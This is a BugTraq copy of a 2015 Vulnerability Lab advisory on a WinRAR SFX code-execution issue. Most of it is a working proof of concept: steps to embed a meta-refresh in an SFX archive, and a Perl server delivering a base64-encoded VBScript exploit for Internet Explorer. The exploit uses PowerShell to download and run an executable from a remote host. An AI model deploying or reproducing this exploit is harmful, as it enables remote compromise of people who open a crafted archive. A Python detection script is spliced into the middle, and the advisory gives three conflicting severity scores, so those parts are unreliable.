BugTraq
WinRAR SFX v5.21 - Remote Code Execution Vulnerability Sep 28 2015 08:24AM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
WinRAR SFX v5.21 - Remote Code Execution Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1608

Video: https://www.youtube.com/watch?v=fo0l0oT4468

Release Date:
=============
2015-09-28

Vulnerability Laboratory ID (VL-ID):
====================================
1608

Common Vulnerability Scoring System:
====================================
9

Product & Service Introduction:
===============================
WinRAR, with over 500 million users worldwide, is by far the most popular compression program and therefore the best way to pack files securely and
efficiently for a data transfer, to speed up data transfer via e-mail, and to store optimized files securely.

(Copy of the Homepage: http://www.win-rar.com/start.html )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a code execution vulnerability in the official WinRAR SFX v5.21 software.

Vulnerability Disclosure Timeline:
==================================
2015-09-28: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

Technical Details & Description:
================================
A remote code execution vulnerability has been discovered in the official WinRAR SFX v5.21 software.
The vulnerability allows remote attackers to execute unauthorized system specific code to compromise a target system.

The issue is located in the `Text and Icon` function of the `Text to display in SFX window` module. Remote attackers are
able to generate their own compressed archives with malicious payloads to execute system specific code and compromise the target. The attacker
stores maliciously generated HTML code in the SFX archive's text input. This results in system specific code execution when a target
user or system opens the compressed archive.

The security risk of the code execution vulnerability is estimated as critical with a CVSS (Common Vulnerability Scoring System) count of 9.2.
Exploitation of the code execution vulnerability requires low user interaction (opening the file) and no privileged system or restricted user account.
Successful exploitation of the remote code execution vulnerability in the WinRAR SFX software results in system, network or device compromise.
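As an added defensive example (not part of the advisory or its PoC), the following Python checker parses the SFX script that WinRAR stores as the archive comment and flags window text that redirects, scripts or embeds remote content, which is what the "Text to display in SFX window" field is abused for here. The `Key=Value` / brace-block script layout, the marker list and the sample script are assumptions constructed for the example.

```python
import re

# Constructed sample of the SFX script WinRAR keeps as the archive comment;
# the "Key=Value" / brace-block layout is assumed, not taken from the advisory.
SAMPLE_SFX_SCRIPT = """;The comment below contains SFX script commands
Title=Quarterly report
Text
{
<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://192.0.2.10"></head></html>
}
Setup=report.pdf
"""

# An SFX window only needs static text, so redirects, script and embedded objects stand out.
SUSPICIOUS = {
    "meta-refresh": re.compile(r'http-equiv\s*=\s*["\']?refresh', re.I),
    "script-block": re.compile(r"<script\b", re.I),
    "embedded-object": re.compile(r"<(object|iframe|embed)\b", re.I),
    "external-url": re.compile(r"\b(?:https?|ftp)://", re.I),
}

def parse_sfx_script(comment):
    """Parse 'Key=Value' lines and multi-line 'Key {...}' blocks into a dict."""
    commands, lines, i = {}, comment.splitlines(), 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith(";"):
            continue  # blank line or ';' comment
        if "=" in line:
            key, value = line.split("=", 1)
            commands[key.strip()] = value.strip()
        elif i < len(lines) and lines[i].strip() == "{":
            i += 1  # skip the opening brace
            block = []
            while i < len(lines) and lines[i].strip() != "}":
                block.append(lines[i])
                i += 1
            i += 1  # skip the closing brace
            commands[line] = "\n".join(block)
    return commands

def flag_sfx_comment(comment):
    """Return the names of suspicious markers found in the SFX window text."""
    text = parse_sfx_script(comment).get("Text", "")
    return [name for name, pat in SUSPICIOUS.items() if pat.search(text)]
```

For a real SFX, read the archive comment with a RAR parser (the `rarfile` module exposes it as `RarFile.comment`) and pass that string to `flag_sfx_comment` instead of the constructed sample.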

Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by remote attackers without a privileged system user account or user interaction.
For a security demonstration, or to reproduce the vulnerability, follow the information and steps provided below.

Manual steps to reproduce the vulnerability ...
1. Run the Perl code: perl poc.pl
2. Right-click on any file and select "Add to archive..."
3. Select "Create SFX archive"
4. Go to the Advanced menu and select "SFX options..."
5. Go to the "Text and icon" menu
6. Copy the Perl output (HTML) and paste it into "Text to display in SFX window"
7. Click OK -- OK
8. Your SFX file is created
9. Just open the SFX file
10. Your link is downloaded/executed on the target
11. Successful reproduction of the code execution vulnerability!

PoC: Exploit Code
#!/usr/bin/perl
# Title : WinRaR SFX - Remote Code Execution
# Affected Versions: All Version
# Tested on Windows 7 / Server 2008
#
# Author: Mohammad Reza Espargham
# Linkedin: https://ir.linkedin.com/in/rezasp
# E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website: www.reza.es
# Twitter: https://twitter.com/rezesp
# FaceBook: https://www.facebook.com/reza.espargham
#
# ID: MS14-064

use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw( decode_base64 );
use Socket 'inet_ntoa';
use Sys::Hostname 'hostname';

print " Mohammad Reza Espargham\n\n";

# Local IP address that the generated HTML will point the SFX window to.
my $ip   = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));
my $port = 80;

# HTML snippet to paste into "Text to display in SFX window":
# a meta refresh that sends the SFX window to this listener.
my $url = 'http://' . $ip . ($port == 80 ? '' : ":$port");
print "Winrar HTML Code\n"
    . '<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=' . $url . '"></head></html>'
    . "\n\n";

# Listening socket for the SFX window's HTTP request.
my $server = IO::Socket::INET->new(
    Proto     => 'tcp',
    LocalPort => $port,
    Listen    => SOMAXCONN,
    ReuseAddr => 1,
) or die "Unable to create server socket: $!";

# Server loop: read the request headers up to the blank line, then respond.
while (my $client = $server->accept()) {
    my $client_info = '';
    while (<$client>) {
        last if /^\r\n$/;
        $client_info .= $_;
    }
    incoming($client, $client_info);
}

sub incoming {
    my ($client, $client_info) = @_;
    print "\n=== Incoming Request:\n";
    print {$client} buildResponse($client, $client_info);
    close($client);
}

sub buildResponse {
    my ($client, $client_info) = @_;

my $poc="CjxodG1sPgo8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbn
Q9IklFPUVt
dWxhdGVJRTgiID4KPGhlYWQ+CjwvaGVhZD4KPGJvZHk+CiAKPFNDUklQVCBMQU5HVUFHRT0i
VkJT
Y3JpcHQiPgoKZnVuY3Rpb24gcnVubXVtYWEoKSAKT24gRXJyb3IgUmVzdW1lIE5leHQKc2V0
IHNo
ZWxsPWNyZWF0ZW9iamVjdCgiU2hlbGwuQXBwbGljYXRpb24iKQpjb21tYW5kPSJJbnZva2Ut
RXhw
cmVzc2lvbiAkKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmls
ZSgn
aHR0cDovL3RoZS5lYXJ0aC5saS9+c2d0YXRoYW0vcHV0dHkvbGF0ZXN0L3g4Ni9wdXR0eS5l
eGUn
LCdsb2FkLmV4ZScpOyQoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVs
bEV4
ZWN1dGUoJ2xvYWQuZXhlJyk7IgpzaGVsbC5TaGVsbEV4ZWN1dGUgInBvd2Vyc2hlbGwuZXhl
Iiwg
Ii1Db21tYW5kICIgJiBjb21tYW5kLCAiIiwgInJ1bmFzIiwgMAplbmQgZnVuY3Rpb24KPC9z
Y3Jp
cHQ+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPgogIApkaW0gICBhYSgpCmRpbSAg
IGFi
KCkKZGltICAgYTAKZGltICAgYTEKZGltICAgYTIKZGltICAgYTMKZGltICAgd2luOXgKZGlt
ICAg
aW50VmVyc2lvbgpkaW0gICBybmRhCmRpbSAgIGZ1bmNsYXNzCmRpbSAgIG15YXJyYXkKIApC
ZWdp
bigpCiAKZnVuY3Rpb24gQmVnaW4oKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgaW5mbz1O
YXZp
Z2F0b3IuVXNlckFnZW50CiAKICBpZihpbnN0cihpbmZvLCJXaW42NCIpPjApICAgdGhlbgog
ICAg
IGV4aXQgICBmdW5jdGlvbgogIGVuZCBpZgogCiAgaWYgKGluc3RyKGluZm8sIk1TSUUiKT4w
KSAg
IHRoZW4gCiAgICAgICAgICAgICBpbnRWZXJzaW9uID0gQ0ludChNaWQoaW5mbywgSW5TdHIo
aW5m
bywgIk1TSUUiKSArIDUsIDIpKSAgIAogIGVsc2UKICAgICBleGl0ICAgZnVuY3Rpb24gIAog
ICAg
ICAgICAgICAgIAogIGVuZCBpZgogCiAgd2luOXg9MAogCiAgQmVnaW5Jbml0KCkKICBJZiBD
cmVh
dGUoKT1UcnVlIFRoZW4KICAgICBteWFycmF5PSAgICAgICAgY2hydygwMSkmY2hydygyMTc2
KSZj
aHJ3KDAxKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKQog
ICAg
IG15YXJyYXk9bXlhcnJheSZjaHJ3KDAwKSZjaHJ3KDMyNzY3KSZjaHJ3KDAwKSZjaHJ3KDAp
CiAK
ICAgICBpZihpbnRWZXJzaW9uPDQpIHRoZW4KICAgICAgICAgZG9jdW1lbnQud3JpdGUoIjxi
cj4g
SUUiKQogICAgICAgICBkb2N1bWVudC53cml0ZShpbnRWZXJzaW9uKQogICAgICAgICBydW5z
aGVs
bGNvZGUoKSAgICAgICAgICAgICAgICAgICAgCiAgICAgZWxzZSAgCiAgICAgICAgICBzZXRu
b3Rz
YWZlbW9kZSgpCiAgICAgZW5kIGlmCiAgZW5kIGlmCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9u
IEJl
Z2luSW5pdCgpCiAgIFJhbmRvbWl6ZSgpCiAgIHJlZGltIGFhKDUpCiAgIHJlZGltIGFiKDUp
CiAg
IGEwPTEzKzE3KnJuZCg2KQogICBhMz03KzMqcm5kKDUpCmVuZCBmdW5jdGlvbgogCmZ1bmN0
aW9u
IENyZWF0ZSgpCiAgT24gRXJyb3IgUmVzdW1lIE5leHQKICBkaW0gaQogIENyZWF0ZT1GYWxz
ZQog
IEZvciBpID0gMCBUbyA0MDAKICAgIElmIE92ZXIoKT1UcnVlIFRoZW4KICAgICAgIENyZWF0
ZT1U
cnVlCiAgICAgICBFeGl0IEZvcgogICAgRW5kIElmIAogIE5leHQKZW5kIGZ1bmN0aW9uCiAK
c3Vi
IHRlc3RhYSgpCmVuZCBzdWIKIApmdW5jdGlvbiBteWRhdGEoKQogICAgT24gRXJyb3IgUmVz
dW1l
IE5leHQKICAgICBpPXRlc3RhYQogICAgIGk9bnVsbAogICAgIHJlZGltICBQcmVzZXJ2ZSBh
YShh
MikgIAogICAKICAgICBhYigwKT0wCiAgICAgYWEoYTEpPWkKICAgICBhYigwKT02LjM2NTk4
NzM3
NDM3ODAxRS0zMTQKIAogICAgIGFhKGExKzIpPW15YXJyYXkKICAgICBhYigyKT0xLjc0MDg4
NTM0
NzMxMzI0RS0zMTAgIAogICAgIG15ZGF0YT1hYShhMSkKICAgICByZWRpbSAgUHJlc2VydmUg
YWEo
YTApICAKZW5kIGZ1bmN0aW9uIAogCiAKZnVuY3Rpb24gc2V0bm90c2FmZW1vZGUoKQogICAg
T24g
RXJyb3IgUmVzdW1lIE5leHQKICAgIGk9bXlkYXRhKCkgIAogICAgaT1ydW0oaSs4KQogICAg
aT1y
dW0oaSsxNikKICAgIGo9cnVtKGkrJmgxMzQpICAKICAgIGZvciBrPTAgdG8gJmg2MCBzdGVw
IDQK
ICAgICAgICBqPXJ1bShpKyZoMTIwK2spCiAgICAgICAgaWYoaj0xNCkgdGhlbgogICAgICAg
ICAg
ICAgIGo9MCAgICAgICAgICAKICAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIp
ICAg
ICAgICAgICAgIAogICAgIGFhKGExKzIpKGkrJmgxMWMrayk9YWIoNCkKICAgICAgICAgICAg
ICBy
ZWRpbSAgUHJlc2VydmUgYWEoYTApICAKIAogICAgIGo9MCAKICAgICAgICAgICAgICBqPXJ1
bShp
KyZoMTIwK2spICAgCiAgICAgICAgICAKICAgICAgICAgICAgICAgRXhpdCBmb3IKICAgICAg
ICAg
ICBlbmQgaWYKIAogICAgbmV4dCAKICAgIGFiKDIpPTEuNjk3NTk2NjMzMTY3NDdFLTMxMwog
ICAg
cnVubXVtYWEoKSAKZW5kIGZ1bmN0aW9uCiAKZnVuY3Rpb24gT3ZlcigpCiAgICBPbiBFcnJv
ciBS
ZXN1bWUgTmV4dAogICAgZGltIHR5cGUxLHR5cGUyLHR5cGUzCiAgICBPdmVyPUZhbHNlCiAg
ICBh
MD1hMCthMwogICAgYTE9YTArMgogICAgYTI9YTArJmg4MDAwMDAwCiAgIAogICAgcmVkaW0g
IFBy
ZXNlcnZlIGFhKGEwKSAKICAgIHJlZGltICAgYWIoYTApICAgICAKICAgCiAgICByZWRpbSAg
UHJl
c2VydmUgYWEoYTIpCiAgIAogICAgdHlwZTE9MQogICAgYWIoMCk9MS4xMjM0NTY3ODkwMTIz
NDU2
Nzg5MDEyMzQ1Njc4OTAKICAgIGFhKGEwKT0xMAogICAgICAgICAgIAogICAgSWYoSXNPYmpl
Y3Qo
YWEoYTEtMSkpID0gRmFsc2UpIFRoZW4KICAgICAgIGlmKGludFZlcnNpb248NCkgdGhlbgog
ICAg
ICAgICAgIG1lbT1jaW50KGEwKzEpKjE2ICAgICAgICAgICAgIAogICAgICAgICAgIGo9dmFy
dHlw
ZShhYShhMS0xKSkKICAgICAgICAgICBpZigoaj1tZW0rNCkgb3IgKGoqOD1tZW0rOCkpIHRo
ZW4K
ICAgICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAg
ICAg
ICAgICAgICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbiAgICAgICAgICAg
ICAK
ICAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUoYWEoYTEpKQogICAgICAgICAgICAg
ICAg
IGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICAgIGVuZCBpZgogICAgICAgICAg
IGVs
c2UKICAgICAgICAgICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKICAgICAgICAgICAgIGV4
aXQg
IGZ1bmN0aW9uCiAKICAgICAgICAgICBlbmQgaWYgCiAgICAgICAgZWxzZQogICAgICAgICAg
IGlm
KHZhcnR5cGUoYWEoYTEtMSkpPD4wKSAgVGhlbiAgICAKICAgICAgICAgICAgICBJZihJc09i
amVj
dChhYShhMSkpID0gRmFsc2UgKSBUaGVuCiAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5
cGUo
YWEoYTEpKQogICAgICAgICAgICAgIGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAg
ICBl
bmQgaWYKICAgICAgICBlbmQgaWYKICAgIGVuZCBpZgogICAgICAgICAgICAgICAKICAgICAK
ICAg
IElmKHR5cGUxPSZoMmY2NikgVGhlbiAgICAgICAgIAogICAgICAgICAgT3Zlcj1UcnVlICAg
ICAg
CiAgICBFbmQgSWYgIAogICAgSWYodHlwZTE9JmhCOUFEKSBUaGVuCiAgICAgICAgICBPdmVy
PVRy
dWUKICAgICAgICAgIHdpbjl4PTEKICAgIEVuZCBJZiAgCiAKICAgIHJlZGltICBQcmVzZXJ2
ZSBh
YShhMCkgICAgICAgICAgCiAgICAgICAgIAplbmQgZnVuY3Rpb24KIApmdW5jdGlvbiBydW0o
YWRk
KSAKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIp
ICAK
ICAgCiAgICBhYigwKT0wICAgCiAgICBhYShhMSk9YWRkKzQgICAgIAogICAgYWIoMCk9MS42
OTc1
OTY2MzMxNjc0N0UtMzEzICAgICAgIAogICAgcnVtPWxlbmIoYWEoYTEpKSAgCiAgICAKICAg
IGFi
KDApPTAKICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKZW5kIGZ1bmN0aW9uCiAKPC9zY3Jp
cHQ+
CiAKPC9ib2R5Pgo8L2h0bWw+";
    $poc = decode_base64($poc);

    # Minimal HTTP/1.0 response carrying the decoded page.
    my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n" . $poc;
    return $r;
}

Security Risk:
==============
The security risk of the code execution vulnerability in the WinRAR SFX software is estimated as high. (CVSS 7.4)

Credits & Authors:
==================
Mohammad Reza Espargham [https://ir.linkedin.com/in/rezasp] (me (at) reza (dot) es [email concealed] or reza.espargham (at) gmail (dot) com [email concealed]) (www.reza.es)

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
PGP KEY: http://www.vulnerability-lab.com/keys/admin (at) vulnerability-lab (dot) com [email concealed]%280x198E9928%29.txt
